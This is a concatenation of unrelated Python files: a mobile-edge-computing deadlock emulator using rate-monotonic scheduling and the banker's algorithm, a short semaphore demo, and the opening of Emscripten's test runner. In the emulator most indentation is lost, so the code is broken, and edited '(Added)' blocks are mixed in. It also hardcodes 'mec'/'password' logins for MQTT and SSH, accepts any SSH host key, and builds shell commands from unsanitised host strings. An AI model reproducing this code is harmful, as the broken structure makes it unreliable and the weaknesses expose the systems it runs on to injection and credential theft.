_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
outward_mec = 0 # keeps count of tasks sent back to another mec after executing
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}]  # [[task_list], {wait_time}] => records tasks re-offloaded to this MEC to execute
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
shared_resource_lock = threading.Lock()
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
def ping(host):
cmd = [f'ping -c 1 {host}']
    try:
        output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
        value = float(output[-2].split('=')[-1].split('/')[0])
    except (ValueError, IndexError, sp.CalledProcessError):
        value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
# cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
cmd = ['ifconfig ens4 | grep inet | head -n 1 | cut -d "t" -f 2 | cut -d " " -f 2']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
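# (Added) Example: for the periods in _tasks above, lcm([20, 5, 10, 10, 15]) == 60,
# which is the hyperperiod used as the scheduling horizon in load_tasks()/scheduler().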
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id, )
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
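# (Added) Small worked example of task_time_map(): with seq = ['t2', 't1', 't2'] and
# process = {'t1': {'wcet': 1}, 't2': {'wcet': 2}}, the loop keeps walking the
# sequence until every remaining wcet reaches zero, yielding ['t2', 't1', 't2'].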
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
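# (Added) A quick feasibility sanity check one could run before scheduler(), based
# on the Liu & Layland utilization bound for rate-monotonic scheduling. The bound
# is sufficient, not necessary. Illustrative sketch, not part of the original code.
def rms_utilization_ok(task_set):
    """Return True if sum(wcet/period) <= n * (2**(1/n) - 1)."""
    n = len(task_set)
    u = sum(t['wcet'] / t['period'] for t in task_set.values())
    return u <= n * (2 ** (1 / n) - 1)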
# generate execution sequence
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
# tasks to offload if exit
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
                # Check whether every resource demand of this process can be met
                # with the currently available work[] vector; an explicit flag
                # avoids the off-by-one where the loop index equals res - 1 even
                # though the final comparison failed.
                satisfiable = True
                for j in range(res):
                    if need[t][j] > work[j]:
                        satisfiable = False
                        break
                # If all needs of p were satisfied.
                if satisfiable:
# Add the allocated resources of
# current P to the available/work
# resources i.e.free the resources
for k in range(res):
work[k] += _allot_[t][k]
# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
print("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
print('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print("System is in safe state.",
"\nSafe sequence is: ", end=" ")
print('safe seq: ', safe_seq)
return safe_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
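# (Added) Illustrative use of the safety check above: get_exec_seq(['t1', 't3', 't5'])
# returns a safe execution order (task names with their list index appended, e.g.
# 't1_0'), or routes unsatisfiable tasks through cooperative_mec() when no fully
# safe sequence exists.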
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
    # broadcast waiting time = total waiting time / 2 (using the full average waiting time can be too tight)
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
timed_out_tasks = 0
def compare_local_mec(list_seq):
global received_time, timed_out_tasks
execute_mec = []
execute_locally = []
diff = time.time() - received_time.pop(0)
checking_times = {}
for i in list_seq:
t_time[i.split('_')[0]][1] -= diff
# if t_time[i.split('_')[0]][1] < 0:
# _client.publish(i.split('_')[0].split('.')[2], str({i.split('_')[0]: get_time() + ['local']}), )
# timed_out_tasks += 1
if t_time[i.split('_')[0]][1] > list_seq[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
checking_times[i] = {'Latency': t_time[i.split('_')[0]][1], 'Expected_exec_time': list_seq[i]}
print('Execution time comparison:= ', checking_times)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
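# (Added) Worked example of the running-average update above: if ma1 already has
# 3 samples with a last average of 4.0 and the new sample a1 is 6.0, then _count
# becomes 4 and the new average is ((4 - 1) * 4.0 + 6.0) / 4 = 4.5.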
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
# print('received: ', hosts)
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
                        address[0]))  # calculate moving average of MEC wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
# if j.split('.')[1] != node_id:
# send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
# outward_mec += 1
# elif j.split('.')[1] == node_id:
# # send_client({j: get_time()}, send_back_host)
# _client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
# count_task_sent(j)
# else:
# print('else execute: ', j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
offload_check[0] += 1
outward_mec += 1
elif len(reoffload_list[0]) > 1:
                    # snapshot the shared structure so removing entries from
                    # reoffload_list below does not mutate the list being iterated
                    o = [reoffload_list[0][:], dict(reoffload_list[1])]
                    offload_check[1] += len(o[0])
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+bankers {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_2_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_2_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}" \
f"\ntask_received{_id_}_2_{mec_no} = {total_received_task} \nsent_t{_id_}_2_{mec_no} = {clients_record}" \
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}\n" \
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}\n"
list_result = [
f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} \noff_cloud{_id_}_2_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_2_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}",
f"\ntask_received{_id_}_2_{mec_no} = {total_received_task} \nsent_t{_id_}_2_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}"
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_2_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_2_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_2_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
def terminate_process():
global prev_t, _loc, _off_mec, _off_cloud, _inward_mec, outward_mec, deadlock, memory, mec_waiting_time, mec_rtt
global offload_register, reoffload_list, discovering, test, _time, _pos, received_task_queue, received_time
global cloud_register, t_track, task_record, task_id, cooperate, clients_record, offload_check
global timed_out_tasks, total_received_task, _cpu
# reinitialize #
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
outward_mec = 0 # keeps count of tasks sent back to another mec after executing
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
    reoffload_list = [[], {}]  # [[task_list], {wait_time}] => records tasks re-offloaded to this MEC to execute
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
cooperate = {'mec': 0, 'cloud': 0}
clients_record = {}
offload_check = [0, 0]
timed_out_tasks = 0
total_received_task = 0
time.sleep(1)
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('RMS List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
if len(compare_result[0]) > 0:
print('\nSending to cooperative platform')
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(0.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
            stop = True  # signal the worker threads to exit before joining them
for th in threads_:
th.join()
time.sleep(1)
print('done')
# os.system('kill -9 {}'.format(os.getpid()))
break
print('algo stopped!')
run = 1
stop = True
time.sleep(20)
for th in threads_:
th.join()
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('Terminating process')
terminate_process()
|
Semaphore.py
|
import logging
import threading
import time
import random
LOG_FORMAT = '%(asctime)s %(threadName)-17s %(levelname)-8s %(message)s'
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
semaphore = threading.Semaphore(0)
item = 0
def consumer():
logging.info('Consumer is waiting')
semaphore.acquire()
logging.info('Consumer notify: item number {}'.format(item))
def producer():
global item
time.sleep(3)
item = random.randint(0, 1000)
logging.info('Producer notify: item number {}'.format(item))
semaphore.release()
def main():
for i in range(10):
t1 = threading.Thread(target=consumer)
t2 = threading.Thread(target=producer)
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == "__main__":
main()
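# (Added note) Because the semaphore is initialised to 0, each consumer blocks in
# acquire() until the matching producer calls release(); the semaphore here acts
# as a one-shot signal between the two threads rather than a resource counter.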
|
runner.py
|
#!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from __future__ import print_function
from subprocess import PIPE, STDOUT
from functools import wraps
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import shlex
import shutil
import string
import subprocess
import sys
import tempfile
import time
import unittest
import webbrowser
if sys.version_info.major == 2:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote, unquote_plus
else:
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import clang_native
import jsrun
import parallel_testsuite
from jsrun import NON_ZERO
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, EMXX, DEBUG
from tools.shared import LLVM_TARGET, ASM_JS_TARGET, EMSCRIPTEN_TEMP_DIR
from tools.shared import WASM_TARGET, SPIDERMONKEY_ENGINE, WINDOWS
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, try_delete
from tools.shared import asbytes, safe_copy, Settings
from tools import shared, line_endings, building
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger(__file__)
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# TODO(sbc): Remove this check for the legacy name once its been around for a while.
assert 'EM_SAVE_DIR' not in os.environ, "Please use EMTEST_SAVE_DIR instead of EM_SAVE_DIR"
EMTEST_SAVE_DIR = int(os.getenv('EMTEST_SAVE_DIR', '0'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
